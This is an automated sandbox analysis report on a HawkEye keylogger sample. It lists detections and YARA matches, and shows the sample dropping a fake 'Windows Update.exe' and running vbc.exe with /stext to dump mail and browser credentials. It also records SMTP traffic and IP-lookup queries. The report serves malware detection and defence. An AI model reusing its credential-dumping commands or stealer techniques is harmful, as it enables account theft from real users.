Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Sample_B.exe

Overview

General Information

Sample Name:Sample_B.exe
Analysis ID:354163
MD5:78300bd48d50fa7e5f3f6a933cc5f739
SHA1:03157f27b0d5141465adeeaf9b3a7b5f3e60f614
SHA256:424212e76c0e660538ee49126079980b34f4dd343e002004f67ea71a937af5e3

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Sample uses process hollowing technique
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • Sample_B.exe (PID: 2368 cmdline: 'C:\Users\user\Desktop\Sample_B.exe' MD5: 78300BD48D50FA7E5F3F6A933CC5F739)
    • Windows Update.exe (PID: 2360 cmdline: 'C:\Users\user\AppData\Roaming\Windows Update.exe' MD5: 78300BD48D50FA7E5F3F6A933CC5F739)
      • dw20.exe (PID: 2932 cmdline: dw20.exe -x -s 1708 MD5: FBA78261A16C65FA44145613E3669E6E)
      • vbc.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
      • vbc.exe (PID: 2816 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Sample_B.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Sample_B.exeRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x7ba1d:$key: HawkEyeKeylogger
  • 0x7dd13:$salt: 099u787978786
  • 0x7c09a:$string1: HawkEye_Keylogger
  • 0x7ceed:$string1: HawkEye_Keylogger
  • 0x7dc73:$string1: HawkEye_Keylogger
  • 0x7c483:$string2: holdermail.txt
  • 0x7c4a3:$string2: holdermail.txt
  • 0x7c3c5:$string3: wallet.dat
  • 0x7c3dd:$string3: wallet.dat
  • 0x7c3f3:$string3: wallet.dat
  • 0x7d837:$string4: Keylog Records
  • 0x7db4f:$string4: Keylog Records
  • 0x7dd6b:$string5: do not script -->
  • 0x7ba05:$string6: \pidloc.txt
  • 0x7ba93:$string7: BSPLIT
  • 0x7baa3:$string7: BSPLIT
Sample_B.exeJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    Sample_B.exeJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      Sample_B.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        Click to see the 1 entries

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\WindowsUpdate.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
        • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
        C:\Users\user\AppData\Roaming\WindowsUpdate.exeRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
        • 0x7ba1d:$key: HawkEyeKeylogger
        • 0x7dd13:$salt: 099u787978786
        • 0x7c09a:$string1: HawkEye_Keylogger
        • 0x7ceed:$string1: HawkEye_Keylogger
        • 0x7dc73:$string1: HawkEye_Keylogger
        • 0x7c483:$string2: holdermail.txt
        • 0x7c4a3:$string2: holdermail.txt
        • 0x7c3c5:$string3: wallet.dat
        • 0x7c3dd:$string3: wallet.dat
        • 0x7c3f3:$string3: wallet.dat
        • 0x7d837:$string4: Keylog Records
        • 0x7db4f:$string4: Keylog Records
        • 0x7dd6b:$string5: do not script -->
        • 0x7ba05:$string6: \pidloc.txt
        • 0x7ba93:$string7: BSPLIT
        • 0x7baa3:$string7: BSPLIT
        C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
            C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 7 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
                  • 0x7b81d:$key: HawkEyeKeylogger
                  • 0x7db13:$salt: 099u787978786
                  • 0x7be9a:$string1: HawkEye_Keylogger
                  • 0x7cced:$string1: HawkEye_Keylogger
                  • 0x7da73:$string1: HawkEye_Keylogger
                  • 0x7c283:$string2: holdermail.txt
                  • 0x7c2a3:$string2: holdermail.txt
                  • 0x7c1c5:$string3: wallet.dat
                  • 0x7c1dd:$string3: wallet.dat
                  • 0x7c1f3:$string3: wallet.dat
                  • 0x7d637:$string4: Keylog Records
                  • 0x7d94f:$string4: Keylog Records
                  • 0x7db6b:$string5: do not script -->
                  • 0x7b805:$string6: \pidloc.txt
                  • 0x7b893:$string7: BSPLIT
                  • 0x7b8a3:$string7: BSPLIT
                  00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                    00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                      Click to see the 34 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.Sample_B.exe.bc9c0d.1.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                        0.2.Sample_B.exe.2577280.5.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                        • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                        2.2.Windows Update.exe.46e0000.9.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                        • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                        2.2.Windows Update.exe.46f0000.10.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                        • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                        0.2.Sample_B.exe.c1fa72.2.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                          Click to see the 104 entries

                          Sigma Overview

                          No Sigma rule has matched

                          Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Antivirus / Scanner detection for submitted sampleShow sources
                          Source: Sample_B.exeAvira: detected
                          Source: Sample_B.exeAvira: detected
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                          Found malware configurationShow sources
                          Source: Windows Update.exe.2360.2.memstrMalware Configuration Extractor: HawkEye {"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                          Machine Learning detection for sampleShow sources
                          Source: Sample_B.exeJoe Sandbox ML: detected
                          Source: 0.0.Sample_B.exe.bc0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                          Source: 0.0.Sample_B.exe.bc0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                          Source: 2.2.Windows Update.exe.ee0000.1.unpackAvira: Label: TR/AD.MExecute.lzrac
                          Source: 2.2.Windows Update.exe.ee0000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
                          Source: 0.2.Sample_B.exe.bc0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                          Source: 0.2.Sample_B.exe.bc0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                          Source: 2.0.Windows Update.exe.ee0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                          Source: 2.0.Windows Update.exe.ee0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473

                          Compliance:

                          barindex
                          Uses 32bit PE filesShow sources
                          Source: Sample_B.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Uses new MSVCR DllsShow sources
                          Source: C:\Users\user\Desktop\Sample_B.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior
                          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                          Source: Sample_B.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Binary contains paths to debug symbolsShow sources
                          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: pC:\Win.pdbassembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: F^symbols\dll\mscorlib.pdb^ source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: .pdb; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: ^indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: mscorlib.pdbs\AppData\Roaming\Windows Update.exe source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: C:\Windows\mscorlib.pdb8 source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Sample_B.exe
                          Source: Binary string: dows\mC:\Users\user\AppData\Roaming__b77a5c561934e089\mscorlib.pdbne_d08cc06a442b34fc source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmp
                          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Sample_B.exe
                          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Sample_B.exe
                          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbFP source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: ^T3/pC:\Windows\mscorlib.pdb4 source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: mscorrc.pdb source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2111699782.0000000000E70000.00000002.00000001.sdmp
                          Source: Sample_B.exeBinary or memory string: autorun.inf
                          Source: Sample_B.exeBinary or memory string: [autorun]
                          Source: Windows Update.exeBinary or memory string: [autorun]
                          Source: Windows Update.exeBinary or memory string: autorun.inf
                          Source: Sample_B.exeBinary or memory string: autorun.inf
                          Source: Sample_B.exeBinary or memory string: [autorun]
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_005514C0
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_00550728
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_005517F8
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 4x nop then jmp 00551A73h0_2_005519B0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]2_2_004E7810
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E6059
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004EC627
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E9C3F
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then call 004E1B20h2_2_004E9634
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E9634
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then mov esp, ebp2_2_004E48C7
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E14C0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E5CEE
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E98F9
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004EA2F0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004EC48F
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then call 004E1B20h2_2_004E954A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E954A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E0728
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E6731
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004EA3DA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then call 004E1B20h2_2_004E8DE8
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E8DE8
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_004E17F8
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 004E1A73h2_2_004E19A0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 004E1A73h2_2_004E19B0

                          Networking:

                          barindex
                          May check the online IP address of the machineShow sources
                          Source: unknownDNS query: name: whatismyipaddress.com
                          Source: unknownDNS query: name: whatismyipaddress.com
                          Source: unknownDNS query: name: whatismyipaddress.com
                          Source: unknownDNS query: name: whatismyipaddress.com
                          Source: unknownDNS query: name: whatismyipaddress.com
                          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 66.102.1.108:587
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 104.16.155.36 104.16.155.36
                          Source: Joe Sandbox ViewIP Address: 66.102.1.108 66.102.1.108
                          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 66.102.1.108:587
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_0011A09A recv,2_2_0011A09A
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                          Source: Sample_B.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                          Source: Sample_B.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                          Source: Sample_B.exe, 00000000.00000002.2075873795.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                          Source: Sample_B.exe, 00000000.00000002.2075873795.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                          Source: Sample_B.exe, Windows Update.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                          Source: unknownDNS traffic detected: queries for: 163.190.5.0.in-addr.arpa
                          Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
                          Source: Sample_B.exeString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                          Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                          Source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                          Source: 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                          Source: Sample_B.exeString found in binary or memory: http://ocsp.comodoca.com0
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                          Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                          Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                          Source: Sample_B.exe, Windows Update.exeString found in binary or memory: http://whatismyipaddress.com/
                          Source: Sample_B.exeString found in binary or memory: http://whatismyipaddress.com/-
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                          Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                          Source: Sample_B.exeString found in binary or memory: http://www.nirsoft.net/
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                          Source: Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                          Source: Sample_B.exe, Windows Update.exeString found in binary or memory: https://login.yahoo.com/config/login
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
                          Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                          Source: Sample_B.exe, Windows Update.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected HawkEye KeyloggerShow sources
                          Source: Yara matchFile source: Sample_B.exe, type: SAMPLE
